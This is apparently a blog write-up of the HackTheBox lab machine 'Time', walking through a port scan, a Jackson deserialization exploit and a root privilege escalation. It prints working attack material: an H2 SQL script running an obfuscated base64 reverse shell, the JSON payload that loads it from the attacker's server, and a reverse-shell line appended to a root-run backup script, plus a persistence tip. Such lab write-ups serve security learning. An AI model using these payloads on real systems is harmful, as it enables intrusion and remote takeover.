This page looks best with JavaScript enabled

HackTheBox: Time

 ·  ☕ 2 min read

User

We start by checking what ports are open in the target:

[jusepe@nix:~/Documents/HackTheBox/Time]$ sudo scan time.htb
[sudo] password for jusepe: 
[*] OS based on TTL
Unknown OS
[*] TCP Scan
Open ports: 80,22
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
         TTL: 0
         Furious: 12
         Nmap: 9
         Total: 21

There is a web on port 80, and after trying the functionality it throws a java exception error trying to parse the json, which may look like a possible attack vector:

Deserialization attack

There is a CVE for that specific library so followed this POC to exploit it:

Created the inject.sql file and started a web server on my machine:

[jusepe@nix:~/Documents/HackTheBox/Time]$ cat inject.sql 
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4xOTMvODE4MSAwPiYxCg== | base64 -d | bash')
[jusepe@nix:~/Documents/HackTheBox/Time]$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.214 - - [19/Jan/2021 18:02:38] "GET /inject.sql HTTP/1.1" 200 -

Then sent the following payload to the validator endpoint:

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.15.193:8000/inject.sql'"}]

Root

Trying to check for processes being run in the background used pspy:

pspy

There is an interesting process being run with UID 0 (as root) that is executing /usr/bin/timer_backup.sh so checked if we had permissions to read it:

(remote) pericles@time:/tmp$ ls -la /usr/bin/timer_backup.sh
-rwxrw-rw- 1 pericles pericles 88 Jan 19 18:35 /usr/bin/timer_backup.sh

We have permissions to write on it so added a reverse shell to it in order to get root:

(remote) pericles@time:/tmp$ cat /usr/bin/timer_backup.sh 
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip && bash -i >& /dev/tcp/10.10.15.193/9999 0>&1

Keep in mind that the process doesn’t last for a long time in order to add persistence you could add your ssh key to authorized keys.

Share on

ITasahobby
WRITTEN BY
ITasahobby
InTernet lover